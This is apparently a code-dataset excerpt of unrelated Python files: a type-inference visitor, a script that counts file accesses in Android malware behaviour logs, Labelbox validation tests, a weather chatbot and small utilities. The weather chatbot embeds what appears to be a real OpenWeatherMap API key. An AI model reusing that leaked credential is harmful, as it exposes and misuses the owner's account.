This is so that tree rewrites can take advantage of type \n information in order to be more selective about what they rewrite.\n \"\"\"\n\n def __init__(self, tree_manager, imported_types, strategy):\n self.tree_manager = tree_manager\n self.imported_types = imported_types\n self.strategy = strategy\n\n def start(self):\n self.tree_manager.visit(\"FunctionCall\", self.visit_imported_functions)\n for node in self.tree_manager.leaf_nodes:\n pnode = node.parent\n while 1:\n pnode.resolve_types()\n if pnode.parent:\n pnode = pnode.parent\n else:\n break\n\n pnode.visit(self.visit_for_range)\n pnode.visit(self.visit_for_collection)\n pnode.visit(self.visit_append)\n pnode.visit(self.visit_subscript)\n\n def visit_imported_functions(self, node):\n name = node.identifier.value.value\n if name in self.imported_types:\n node.typeinfo = self.imported_types[name]\n\n def visit_append(self, node):\n if not isinstance(node, self.strategy.FunctionCall):\n return\n\n name = node.identifier.value.value\n\n if name != \"append\":\n return\n\n node.arglist.args[0].resolve_types()\n \n val = node.arglist.args[0]\n arrtype = node.parent.left_expr.typeinfo\n valuetype = arrtype.value\n if valuetype and valuetype.base != val.typeinfo.base:\n raise TypeError(\"can't mix types in a list!\")\n else:\n typeinfo = TypeInfo(Types.ARRAY, TypeInfo(Types.NUMBER), val.typeinfo)\n node.parent.left_expr.typeinfo = typeinfo\n\n def visit_subscript(self, node):\n if not isinstance(node, self.strategy.Subscript):\n return\n\n parent = node.parent\n if isinstance(parent, self.strategy.Assignment):\n expr_type = parent.expr.typeinfo\n subr_type = node.expr.typeinfo\n typeinfo = node.identifier.typeinfo\n\n if typeinfo.base == Types.DICT:\n key_type = typeinfo.key\n value_type = typeinfo.value\n\n if key_type and key_type.base != subr_type.base:\n raise TypeError(\"can't mix key types in a dictionary!\")\n \n if value_type and value_type.base != expr_type.base:\n raise TypeError(\"can't mix value types in a dictionary!\")\n\n if not key_type:\n node.identifier.typeinfo.key = subr_type\n \n if not value_type:\n node.identifier.typeinfo.value = expr_type\n \n def visit_for_collection(self, node):\n if not isinstance(node, self.strategy.ForCollection):\n return\n\n collection = node.collection\n loop_var = node.loop_var\n\n loop_var.typeinfo = collection.typeinfo.value\n\n def visit_for_range(self, node):\n if not isinstance(node, self.strategy.ForRange):\n return\n\n loop_var = node.loop_var\n loop_var.typeinfo = TypeInfo(Types.NUMBER) \n\n","sub_path":"intermediate.py","file_name":"intermediate.py","file_ext":"py","file_size_in_byte":7167,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"60216480","text":"# coding=utf-8\n\n#这个脚本的作用是统计filename在每个病毒的_pre文件中出现的次数以及出现的平均时间,并且按照从大到小进行排序\n\nimport re\nimport os\nimport configparser\nfrom collections import OrderedDict\nimport shutil\n\ndef getDirLoc(path): # 得到文件夹的绝对路径\n dirLoc = []\n for x in os.listdir(path):\n # if \"_出现频率\" in x:\n # continue\n if os.path.isdir(os.path.join(path, x)):\n dirLoc.append(os.path.join(path, x))\n return dirLoc\n\ndef getFileLoc(path): # 得到文件的绝对路径\n txtlist = []\n for x in os.listdir(path):\n if os.path.isfile(os.path.join(path, x)):\n if os.path.splitext(x)[1] == '.txt' and '_pre.txt' in x:\n txtlist.append(os.path.join(path, x))\n return txtlist\n\n\ndef check(filename):\n if re.match(r\"/proc/\\d*?/\",filename) is None: # 说明不是/proc/数字的形式,则保留该字段\n return True\n return False\n\ntry:\n cf = 
configparser.ConfigParser()\n cf.read('Init.ini', encoding='utf-8')\n examplepath = cf.get('path', 'resultPath') # 这个examplepath需要四级目录,第一级是大目录,第二级是每种不同病毒的族分类,第三级是由病毒的三个txt形成的文件夹,第四级是三个txt文件\n resultpath = cf.get('path','resultPath') # 存储结果的路径\nexcept configparser.NoSectionError as e:\n exit(\"Init.ini does not exist,please check it\")\n# print(path)\nif os.path.exists(resultpath) is False:\n os.mkdir(resultpath)\n\n\ndirLoc = getDirLoc(examplepath)\n\nfor x in dirLoc:\n print(\"正在探测 \"+x+\"............\") #第一层目录\n tmpDir = getDirLoc(x) #如一类恶意样本检测结果\n loc = os.path.join(resultpath,os.path.split(x)[1]+\"_出现频率\")\n if os.path.exists(loc):\n shutil.rmtree(loc)\n os.mkdir(loc)\n for y in tmpDir: #第二层目录\n dic = {}\n timdic = {}\n # test = 0\n print(\"正在处理\"+y+\".............\")\n tmpFile = getFileLoc(y) #如 GPS+获取通话记录+获取短信息\n for z in tmpFile: # 文件\n with open(z, \"r\", encoding='utf-8') as f:\n data = f.readlines()\n flag = 1\n for line in data:\n if flag:\n flag = 0\n continue\n line = line.split()\n filename = line[-1]\n mode = line[-2]\n timedif = line[-3]\n\n # if filename == '/proc/net/xt_qtaguid/iface_stat_all':\n # test += 1\n\n # mode = '0' if mode == '0' else '1'\n # if filename == 'allFilename':\n # print(mode, timedif)\n\n if check(filename) is False:\n continue\n if timedif != \"None\" and float(timedif) < 0: # 时间小于0,无效数据,略去\n timedif = '0'\n\n if (filename[0] != '/'):\n filename = '/'+filename\n\n if filename not in dic:\n dic[filename]= {}\n dic[filename][mode] = 1\n else:\n\n if mode not in dic[filename]:\n dic[filename][mode] = 0\n dic[filename][mode] += 1\n\n if filename not in timdic:\n timdic[filename] = {}\n timdic[filename][mode] = 0\n\n else:\n if mode not in timdic[filename]:\n timdic[filename][mode] = 0\n\n if timedif != \"None\":\n timdic[filename][mode] += float(timedif)\n\n # print(z)\n num = len(timdic)\n # dic = list(dic)\n dic = sorted(dic.items(),key=lambda d:[y[1] for y in d[1].items()],reverse=True)\n # print(dic)\n # print(test)\n dic = OrderedDict(dic)\n writePath = os.path.join(loc,os.path.split(y)[1]+\".txt\")\n with open(writePath, \"w\", encoding='utf-8') as f:\n newline = \"%-90s%-10s%-10s%-10s\\n\" % (\"文件名\", \"访问模式\", \"访问次数\",\"平均访问时间\")\n f.write(newline)\n for fname in dic.keys():\n for md in dic[fname].keys():\n newline = \"%-100s%-10s%-10s%-10s\\n\" % (fname, md, str(dic[fname][md]),str(timdic[fname][md]/dic[fname][md]))\n # if fname == '/allFilename':\n # print(fname, md, str(dic[fname][md]), str(timdic[fname][md]), str(dic[fname][md]))\n f.write(newline)\n # break\n print(\"\\n\\n\")\n # break\nprint(\"done...\")\n\n","sub_path":"androiddataProcess/dataStatics.py","file_name":"dataStatics.py","file_ext":"py","file_size_in_byte":4744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"483729811","text":"import pytest\n\nfrom labelbox import parser\nfrom pytest_cases import parametrize, fixture_ref\n\nfrom labelbox.exceptions import MALValidationError\nfrom labelbox.schema.bulk_import_request import (NDChecklist, NDClassification,\n NDMask, NDPolygon, NDPolyline,\n NDRadio, NDRectangle, NDText,\n NDTextEntity, NDTool,\n _validate_ndjson)\n\n\ndef test_classification_construction(checklist_inference, text_inference):\n checklist = NDClassification.build(checklist_inference)\n assert isinstance(checklist, NDChecklist)\n text = NDClassification.build(text_inference)\n assert isinstance(text, NDText)\n\n\ndef test_subclassification_construction(rectangle_inference):\n tool = 
NDTool.build(rectangle_inference)\n assert len(tool.classifications) == 1, \"Subclass was not constructed\"\n assert isinstance(tool.classifications[0], NDRadio)\n\n\n@parametrize(\"inference, expected_type\",\n [(fixture_ref('polygon_inference'), NDPolygon),\n (fixture_ref('rectangle_inference'), NDRectangle),\n (fixture_ref('line_inference'), NDPolyline),\n (fixture_ref('entity_inference'), NDTextEntity),\n (fixture_ref('segmentation_inference'), NDMask),\n (fixture_ref('segmentation_inference_rle'), NDMask),\n (fixture_ref('segmentation_inference_png'), NDMask)])\ndef test_tool_construction(inference, expected_type):\n assert isinstance(NDTool.build(inference), expected_type)\n\n\ndef test_incorrect_feature_schema(rectangle_inference, polygon_inference,\n configured_project):\n #Valid but incorrect feature schema\n #Prob the error message says something about the config not anything useful. We might want to fix this.\n pred = rectangle_inference.copy()\n pred['schemaId'] = polygon_inference['schemaId']\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n\ndef no_tool(text_inference, configured_project):\n pred = text_inference.copy()\n #Missing key\n del pred['answer']\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n\ndef test_invalid_text(text_inference, configured_project):\n #and if it is not a string\n pred = text_inference.copy()\n #Extra and wrong key\n del pred['answer']\n pred['answers'] = []\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n del pred['answers']\n\n #Invalid type\n pred['answer'] = []\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n #Invalid type\n pred['answer'] = None\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n\ndef test_invalid_checklist_item(checklist_inference, configured_project):\n #Only two points\n pred = checklist_inference.copy()\n pred['answers'] = [pred['answers'][0], pred['answers'][0]]\n #Duplicate schema ids\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n pred['answers'] = [{\"name\": \"asdfg\"}]\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n pred['answers'] = [{\"schemaId\": \"1232132132\"}]\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n pred['answers'] = [{}]\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n pred['answers'] = []\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n del pred['answers']\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n\ndef test_invalid_polygon(polygon_inference, configured_project):\n #Only two points\n pred = polygon_inference.copy()\n pred['polygon'] = [{\"x\": 100, \"y\": 100}, {\"x\": 200, \"y\": 200}]\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n\ndef test_incorrect_entity(entity_inference, configured_project):\n entity = entity_inference.copy()\n #Location cannot be a list\n entity[\"location\"] = [0, 10]\n with pytest.raises(MALValidationError):\n _validate_ndjson([entity], configured_project)\n\n entity[\"location\"] = {\"start\": -1, \"end\": 5}\n with pytest.raises(MALValidationError):\n _validate_ndjson([entity], configured_project)\n\n entity[\"location\"] = {\"start\": 15, \"end\": 
5}\n with pytest.raises(MALValidationError):\n _validate_ndjson([entity], configured_project)\n\n\ndef test_incorrect_mask(segmentation_inference, configured_project):\n seg = segmentation_inference.copy()\n seg['mask']['colorRGB'] = [-1, 0, 10]\n with pytest.raises(MALValidationError):\n _validate_ndjson([seg], configured_project)\n\n seg['mask']['colorRGB'] = [0, 0]\n with pytest.raises(MALValidationError):\n _validate_ndjson([seg], configured_project)\n\n seg['mask'] = {'counts': [0], 'size': [0, 1]}\n with pytest.raises(MALValidationError):\n _validate_ndjson([seg], configured_project)\n\n seg['mask'] = {'counts': [-1], 'size': [1, 1]}\n with pytest.raises(MALValidationError):\n _validate_ndjson([seg], configured_project)\n\n\ndef test_all_validate_json(configured_project, predictions):\n #Predictions contains one of each type of prediction.\n #These should be properly formatted and pass.\n _validate_ndjson(predictions, configured_project)\n\n\ndef test_incorrect_line(line_inference, configured_project):\n line = line_inference.copy()\n line[\"line\"] = [line[\"line\"][0]] #Just one point\n with pytest.raises(MALValidationError):\n _validate_ndjson([line], configured_project)\n\n\ndef test_incorrect_rectangle(rectangle_inference, configured_project):\n del rectangle_inference['bbox']['top']\n with pytest.raises(MALValidationError):\n _validate_ndjson([rectangle_inference], configured_project)\n\n\ndef test_duplicate_tools(rectangle_inference, configured_project):\n #Trying to upload a polygon and rectangle at the same time\n pred = rectangle_inference.copy()\n pred['polygon'] = [{\"x\": 100, \"y\": 100}, {\"x\": 200, \"y\": 200}]\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n\ndef test_invalid_feature_schema(configured_project, rectangle_inference):\n #Trying to upload a polygon and rectangle at the same time\n pred = rectangle_inference.copy()\n pred['schemaId'] = \"blahblah\"\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n\ndef test_name_only_feature_schema(configured_project, rectangle_inference):\n #Trying to upload a polygon and rectangle at the same time\n pred = rectangle_inference.copy()\n del pred['schemaId']\n _validate_ndjson([pred], configured_project)\n\n\ndef test_schema_id_only_feature_schema(configured_project, rectangle_inference):\n #Trying to upload a polygon and rectangle at the same time\n pred = rectangle_inference.copy()\n del pred['name']\n _validate_ndjson([pred], configured_project)\n\n\ndef test_missing_feature_schema(configured_project, rectangle_inference):\n #Trying to upload a polygon and rectangle at the same time\n pred = rectangle_inference.copy()\n del pred['schemaId']\n del pred['name']\n with pytest.raises(MALValidationError):\n _validate_ndjson([pred], configured_project)\n\n\ndef test_validate_ndjson(tmp_path, configured_project):\n file_name = f\"broken.ndjson\"\n file_path = tmp_path / file_name\n with file_path.open(\"w\") as f:\n f.write(\"test\")\n\n with pytest.raises(ValueError):\n configured_project.upload_annotations(name=\"name\",\n annotations=str(file_path),\n validate=True)\n\n\ndef test_validate_ndjson_uuid(tmp_path, configured_project, predictions):\n file_name = f\"repeat_uuid.ndjson\"\n file_path = tmp_path / file_name\n repeat_uuid = predictions.copy()\n repeat_uuid[0]['uuid'] = 'test_uuid'\n repeat_uuid[1]['uuid'] = 'test_uuid'\n\n with file_path.open(\"w\") as f:\n parser.dump(repeat_uuid, f)\n\n with pytest.raises(MALValidationError):\n 
configured_project.upload_annotations(name=\"name\",\n validate=True,\n annotations=str(file_path))\n\n with pytest.raises(MALValidationError):\n configured_project.upload_annotations(name=\"name\",\n validate=True,\n annotations=repeat_uuid)\n\n\ndef test_video_upload(video_checklist_inference, configured_project):\n pred = video_checklist_inference.copy()\n _validate_ndjson([pred], configured_project)\n","sub_path":"tests/integration/annotation_import/test_ndjson_validation.py","file_name":"test_ndjson_validation.py","file_ext":"py","file_size_in_byte":9004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"412245730","text":"import os\nimport sys\n\nimport pyowm\n\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), os.path.pardir)))\n\nfrom bot_platform import Bot, Intent, Domain\n\nowm = pyowm.OWM('21625a9142b94184eabcb93aeb3c7ef9')\n\ntraining_data = {\n\t\"Weather\": {\n\t\t'getWeather': {\n\t\t\t'required_entities': ['LOCATION'],\n\t\t\t'examples': [\n\t\t\t\t'what does the weather look like in (guelph, LOCATION)',\n\t\t\t\t'can you tell me how the weather is for (cambridge, LOCATION)',\n\t\t\t\t'how is the weather today',\n\t\t\t\t'how is it looking like outside today',\n\t\t\t\t\"what's the weather looking like for today in (toronto, LOCATION)\",\n\t\t\t\t'how is the weather in (mississauga, LOCATION) today'\n\t\t\t],\n\t\t\t'responses': {\n\t\t\t\t'success': [\n\t\t\t\t\t'The weather in LOCATION is DESCRIPTION with a high of HIGH and a low of LOW.'\n\t\t\t\t],\n\t\t\t\t'failure': [\n\t\t\t\t\t\"I'm sorry, I was unable to get the weather in LOCATION.\"\n\t\t\t\t],\n\t\t\t\t'needsValue-LOCATION': [\n\t\t\t\t\t'Where would you like me to check the weather?'\n\t\t\t\t]\n\t\t\t}\n\t\t},\n\t\t'goingToRain': {\n\t\t\t'required_entities': ['LOCATION'],\n\t\t\t'examples': [\n\t\t\t\t'is it going to rain in (kitchener, LOCATION)',\n\t\t\t\t'am I going to need a rain coat',\n\t\t\t\t'will it rain in (guelph, LOCATION)',\n\t\t\t\t'is it supposed to rain today in (toronto, LOCATION)',\n\t\t\t\t'is there rain in (ottawa, LOCATION) today'\n\t\t\t],\n\t\t\t'responses': {\n\t\t\t\t'success': [\n\t\t\t\t\t'It RAIN going to rain in LOCATION within the next 3 hours.'\n\t\t\t\t],\n\t\t\t\t'failure': [\n\t\t\t\t\t\"I'm sorry, I was not able to check if it is going to rain in LOCATION.\"\n\t\t\t\t],\n\t\t\t\t'needsValue-LOCATION': [\n\t\t\t\t\t'Where would you like me to check for rain?'\n\t\t\t\t]\n\t\t\t}\n\t\t}\n\t}\n}\n\ndef handle_get_weather(entities):\n\tobservation = owm.weather_at_place('{},on'.format(entities['LOCATION']['value']))\n\tw = observation.get_weather()\n\ttemp = w.get_temperature('celsius')\n\tentities['HIGH'] = {\n\t\t'confidence': 1,\n\t\t'value': str(int(round(temp['temp_max'], 0)))\n\t}\n\tentities['LOW'] = {\n\t\t'confidence': 1,\n\t\t'value': str(int(round(temp['temp_min'], 0)))\n\t}\n\tentities['DESCRIPTION'] = {\n\t\t'confidence': 1,\n\t\t'value': w.get_detailed_status().lower()\n\t}\n\treturn entities\n\ndef handle_going_to_rain(entities):\n\tforecast = owm.daily_forecast('{},on'.format(entities['LOCATION']['value']))\n\ttoday = pyowm.timeutils.next_three_hours()\n\tresult = forecast.will_be_rainy_at(today)\n\tif result == True:\n\t\tentities['RAIN'] = {\n\t\t\t'confidence': 1,\n\t\t\t'value': 'is'\n\t\t}\n\telse:\t\n\t\tentities['RAIN'] = {\n\t\t\t'confidence': 1,\n\t\t\t'value': 'is not'\n\t\t}\n\treturn entities\n\nhandler_mapping = {\n\t'getWeather': handle_get_weather,\n\t'goingToRain': 
handle_going_to_rain\n}\n\nif __name__ == '__main__':\n\tbot = Bot('WeatherBot')\n\n\tfor domain_name, domain_data in training_data.iteritems():\n\t\tdomain_obj = Domain(domain_name)\n\t\tfor intent_name, intent_data in domain_data.iteritems():\n\t\t\tintent_obj = Intent(intent_name)\n\t\t\tintent_obj.set_required_entities(intent_data['required_entities'])\n\t\t\tintent_obj.set_examples(intent_data['examples'])\n\t\t\tintent_obj.set_responses(intent_data['responses'])\n\t\t\tintent_obj.set_handler(handler_mapping[intent_name])\n\t\t\tdomain_obj.add_intent(intent_obj)\n\t\tbot.integrate_domain(domain_obj)\n\n\tbot.train()\n\n\tos.system('clear')\n\n\tprint('Welcome to WeatherBot! I can tell you the weather or if it is going to rain or not.\\n')\n\n\twhile True:\n\t\tuser_input = raw_input('>> ')\n\t\tinput_analysis = bot.analyse_query(user_input)\n\t\tif input_analysis['complete']:\n\t\t\tprint(input_analysis['intent']['object'].handle(input_analysis['entities']))\n\t\telse:\n\t\t\tprint(input_analysis['response'])\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"demo/weatherbot.py","file_name":"weatherbot.py","file_ext":"py","file_size_in_byte":3509,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"341768430","text":"from collections import defaultdict\r\n\r\n\r\nclass Graph:\r\n\r\n    def __init__(self, vertices):\r\n        self.vertices = vertices\r\n        self.graph = defaultdict(list)\r\n        self.visited = [False] * self.vertices\r\n\r\n    def addEdge(self, v, w):\r\n        self.graph[v].append(w)\r\n        self.graph[w].append(v)\r\n\r\n    def checkcyclc(self, v, parent):\r\n        self.visited[v] = True\r\n        for i in self.graph[v]:\r\n            if self.visited[i] == False:\r\n                if self.checkcyclc(i, v):\r\n                    return True\r\n            elif parent != i:\r\n                return True\r\n        return False\r\n\r\n    def isCyclic(self):\r\n        for i in range(self.vertices):\r\n            if self.visited[i] == False:\r\n                if self.checkcyclc(i, -1) == True:\r\n                    return True\r\n        return False\r\n\r\n\r\ng = Graph(4)\r\ng.addEdge(0, 1)\r\ng.addEdge(1, 2)\r\ng.addEdge(2, 3)\r\ng.addEdge(3, 0)\r\nprint(g.isCyclic())\r\n\r\n","sub_path":"DetectCycleUndirectedGraph.py","file_name":"DetectCycleUndirectedGraph.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"517911155","text":"#! 
python3\n# -*- coding:utf-8 -*-\n\nimport os\n# from package import readConfig\nfrom xlrd import open_workbook\n\n\n'''操作excel文件类'''\nclass Common(object):\n\n # xls_name = \"1.xls\"\n # sheet_name = \"Sheet1\"\n # proDir = os.path.split(os.path.realpath(__file__))[0]\n # curDir = os.path.dirname(proDir)\n # caseFile = os.path.join(curDir, \"result\")\n # xlsPath = os.path.join(caseFile, xls_name)\n\n def __init__(self,xls_name,sheet_name):\n proDir = os.path.split(os.path.realpath(__file__))[0]\n curDir = os.path.dirname(proDir)\n caseFile = os.path.join(curDir, \"result\")\n self.xlsPath = os.path.join(caseFile, xls_name)\n self.sheet_name=sheet_name\n\n '''这个是使用xlrd操作excel'''\n #获取excel中的测试用例\n def get_Excel(self):\n # 获取excel的路径\n # print(self.caseFile)\n cls=[]\n file=open_workbook(self.xlsPath)\n sheet=file.sheet_by_name(self.sheet_name)\n nrows=sheet.nrows\n #print(nrows)\n for i in range(nrows):\n if sheet.row_values(i)[1] !=\"case_name\":\n cls.append(sheet.row_values(i))\n #print(cls)\n return cls\n\n #获取sheet\n @property\n def get_sheet(self):\n xl=open_workbook(self.xlsPath)\n sheet=xl.sheet_by_name(self.sheet_name)\n return sheet\n\n #获取excel的rows\n @property\n def get_rows(self):\n rows=self.get_sheet.nrows\n return rows\n\n @property\n def get_cols(self):\n cols=self.get_sheet.ncols\n return cols\n\n #获取用例ID\n @property\n def get_caseID(self):\n caseName=[]\n for i in range(1,self.get_rows):\n caseName.append(self.get_sheet.cell_value(i,0))\n return caseName\n\n #获取用例名称\n @property\n def get_caseName(self):\n caseName=[]\n for i in range(1,self.get_rows):\n caseName.append(self.get_sheet.cell_value(i,1))\n return caseName\n\n\n\n #获取发送请求类型\n @property\n def get_method(self):\n method=[]\n for i in range(1,self.get_rows):\n method.append(self.get_sheet.cell_value(i,2))\n return method\n\n #获取url地址\n @property\n def get_url(self):\n url=[]\n for i in range(1,self.get_rows):\n url.append(self.get_sheet.cell_value(i,3))\n return url\n\n #获取参数类型地址\n @property\n def get_dataType(self):\n data=[]\n for i in range(1,self.get_rows):\n data.append(self.get_sheet.cell_value(i,4))\n return data\n\n #获取参数值\n @property\n def get_data(self):\n data=[]\n for i in range(1,self.get_rows):\n data.append(self.get_sheet.cell_value(i,5))\n # print(self.get_sheet.cell_value(i,5))\n return data\n\n\n #获取检查点\n @property\n def get_CheckData(self):\n data=[]\n for i in range(1,self.get_rows):\n data.append(self.get_sheet.cell_value(i,6))\n return data\n\n\n #修改excel列的值\n def update_sheetValue(self,bool):\n sheet=self.get_sheet\n for i in range(1,self.get_rows):\n # sheet.cell(i,7).value=str(content)\n sheet.cell(i,10).value = bool\n #这里还差一步保存excel\n\n\n\n# 测试代码\n# cn=Common(\"1.xls\",\"Sheet1\")\n# print(cn.get_Excel())\n# cn.get_method\n# print(cn.get_data)\n","sub_path":"Selnium_SaasWeb/package/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":3409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"311246723","text":"__author__ = 'Work'\nimport functools\n\n\ndef print_result(f):\n def wraper():\n result=f()\n print(f)\n if type (result) in [int,str]:\n print(result)\n else:\n if type (result)==type(dict()):\n for key,value in result.items():\n print(key,' = ',value)\n else:\n for i in result:\n print(i)\n return wraper\n\n@print_result\ndef test_1():\n return 1\n\n\n@print_result\ndef test_2():\n return 'iu'\n\n\n@print_result\ndef test_3():\n return {'a': 1, 'b': 2}\n\n\n@print_result\ndef test_4():\n return [1, 
2]\n\n\ntest_1()\ntest_2()\ntest_3()\ntest_4()\n\n\n'''def field(arr,*args):\n    if type(args)==str:\n        for i in arr:\n            yield i[args]\n    else:\n        for i in arr:\n            b={}\n            for j in args:\n                b[j]=i[j]\n            yield b\n'''\n\ndef field(arr,*args):\n    if len(args)==1:\n        for i in arr:\n            yield i[args[0]]\n    else:\n        for i in arr:\n            b={}\n            for j in args:\n                b[j]=i[j]\n            yield b\n\n\n'''\ndef field(arr,*args):\n    if type(args)==str:\n        for i in arr:\n            yield i[args]\n'''\n\n\n\nf=[{'a':1,'b':2,'c':7},{'a':3,'b':4,'c':8}]\n\n\nc=field(f,'a','b')\nd=field(f,'a')\nfor i in c:\n    print(i)\nfor i in d:\n    print(i)\n'''\n'''#b = field(f,'a')\n\n#for i in b:\n    #print(i)\n\n'''try:\n        print('массив')\n        for i in result:\n            print(i)\n    except(TypeError):\n        print('словарь')\n        for key,value in result.items():\n            print(key,' = ',value)'''\n","sub_path":"RIP/PycharmProjects/lab7_1/lab7_1/lab7_1/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"267071596","text":"#!/usr/bin/env python\n\"\"\"make meta dir from meta file\"\"\"\n\nimport argparse\nimport itertools\nimport os\nimport re\nimport shutil\nimport pandas as pd\nimport scipy.spatial.distance\nfrom geopy.distance import vincenty\n\n\n# --------------------------------------------------\ndef get_args():\n    \"\"\"argparser\"\"\"\n    parser = argparse.ArgumentParser(description='Make metadata dir')\n    parser.add_argument(\n        '-f',\n        '--file',\n        help='Metadata file',\n        type=str,\n        metavar='FILE',\n        required=True)\n    parser.add_argument(\n        '-o',\n        '--out_dir',\n        help='Output directory',\n        type=str,\n        metavar='DIR',\n        default='')\n    parser.add_argument(\n        '-e',\n        '--eucdistper',\n        help='Euclidean distance percentage (0.10)',\n        type=float,\n        metavar='FLOAT',\n        default=0.10)\n    parser.add_argument(\n        '-s',\n        '--sampledist',\n        type=int,\n        metavar='INT',\n        default=1000,\n        help='Sample distance in km (1000)')\n    parser.add_argument(\n        '-n',\n        '--names',\n        type=str,\n        metavar='STR',\n        default='',\n        help='Comma-separated list of sample names')\n    parser.add_argument(\n        '-l',\n        '--list',\n        type=str,\n        metavar='STR',\n        default='',\n        help='File with sample names one per line')\n    return parser.parse_args()\n\n\n# --------------------------------------------------\ndef main():\n    \"\"\"main\"\"\"\n    args = get_args()\n    meta = args.file\n    out_dir = prep_out_dir(args)\n    euc_dist = args.eucdistper\n    max_dist = args.sampledist\n    restrict = get_sample_names(args)\n\n    if not headers_ok(meta):\n        msg = '\"{}\" headers must be \"name\" first, end with \"d,\" \"c,\" or \"ll\"'\n        print(msg.format(os.path.basename(meta)))\n        exit(1)\n\n    if not 0 < euc_dist < 1:\n        print('--eucdistper ({}) must be between 0 and 1'.format(euc_dist))\n        exit(1)\n\n    if max_dist < 0:\n        print('--sampledist ({}) must be a positive number'.format(max_dist))\n        exit(1)\n\n    dataframe = pd.read_table(meta, index_col=0)\n    cols = dataframe.columns.tolist()\n\n    for col_num, col in enumerate(cols):\n        data = dataframe.loc[restrict, col] if restrict else dataframe[col]\n        matrix = None\n        if re.search(r'\\.d$', col):\n            matrix = discrete_vals(data)\n        elif re.search(r'\\.c$', col):\n            matrix = continuous_vals(data, euc_dist)\n        elif re.search(r'\\.ll$', col):\n            matrix = lat_lon_vals(data, max_dist)\n\n        if not matrix is None:\n            path = os.path.join(out_dir, col + '.meta')\n            print('{:3}: Writing {}'.format(col_num + 1, path))\n            matrix.to_csv(path, sep='\\t')\n        else:\n            print('No data for col \"{}\"'.format(col))\n\n    print('Done, see output in 
\"{}\"'.format(out_dir))\n\n\n# --------------------------------------------------\ndef get_sample_names(args):\n \"\"\"names can come from --name or --list (file)\"\"\"\n if len(args.names) > 0:\n return re.split(r'\\s*,\\s*', args.names)\n\n if len(args.list) > 0 and os.path.isfile(args.list):\n files_fh = open(args.list, 'r')\n return files_fh.read().splitlines()\n\n return []\n\n\n# --------------------------------------------------\ndef prep_out_dir(args):\n \"\"\"default out_dir is \"meta\" in same dir as meta file\"\"\"\n\n out_dir = args.out_dir\n\n if len(out_dir) == 0:\n meta_file_dir = os.path.dirname(os.path.abspath(args.file))\n out_dir = os.path.join(meta_file_dir, 'meta')\n\n if os.path.isdir(out_dir):\n shutil.rmtree(out_dir)\n\n os.makedirs(out_dir)\n\n return out_dir\n\n\n# --------------------------------------------------\ndef headers_ok(meta):\n \"\"\"check that headers are 'name' or end with c/d/ll\"\"\"\n meta_fh = open(meta)\n headers = meta_fh.readline().rstrip().split('\\t')\n\n return headers[0] == 'name' and \\\n all(map(lambda s: re.search(r'\\.(c|d|ll)$', s), headers[1:]))\n\n\n# --------------------------------------------------\ndef discrete_vals(data):\n \"\"\"discrete\"\"\"\n ordered = sorted(data.index.tolist())\n matrix = pd.DataFrame(1, index=ordered, columns=ordered)\n\n for sample1, sample2 in itertools.combinations(data.index, 2):\n val = 1 if data[sample1] == data[sample2] else 0\n matrix[sample1][sample2] = val\n matrix[sample2][sample1] = val\n\n return matrix\n\n\n# --------------------------------------------------\ndef continuous_vals(data, threshold):\n \"\"\"continuous\"\"\"\n ordered = sorted(data.index.tolist())\n combos = list(itertools.combinations(data.index, 2))\n dist = pd.DataFrame(0, index=ordered, columns=ordered)\n\n #\n # First calculate all distances\n #\n for sample1, sample2 in combos:\n dist[sample1][sample2] = \\\n scipy.spatial.distance.euclidean(data[sample1], data[sample2])\n\n #\n # Get all the distances greater than 0 as a list\n #\n distances = sorted(filter(lambda n: n > 0, \\\n itertools.chain.from_iterable(dist.values.tolist())))\n\n #\n # Figure out the bottom X percent/max value\n #\n count = len(distances)\n max_index = int(count * threshold)\n max_val = distances[max_index - 1]\n\n #\n # Create the return matrix using 1/0 for the distance w/in tolerance\n #\n matrix = pd.DataFrame(0, index=ordered, columns=ordered)\n for sample1, sample2 in combos:\n val = 1 if int(dist[sample1][sample2] < max_val) else 0\n matrix[sample1][sample2] = val\n matrix[sample2][sample1] = val\n\n return matrix\n\n\n# --------------------------------------------------\ndef lat_lon_vals(data, max_dist):\n \"\"\"latitude/longitude\"\"\"\n ordered = sorted(data.index.tolist())\n matrix = pd.DataFrame(1, index=ordered, columns=ordered)\n\n for sample1, sample2 in itertools.combinations(data.index, 2):\n pos1 = re.split(r'\\s*,\\s*', data[sample1])\n pos2 = re.split(r'\\s*,\\s*', data[sample2])\n val = 1 if int(vincenty(pos1, pos2).kilometers < max_dist) else 0\n matrix[sample1][sample2] = val\n matrix[sample2][sample1] = val\n\n return matrix\n\n\n# --------------------------------------------------\nif __name__ == '__main__':\n 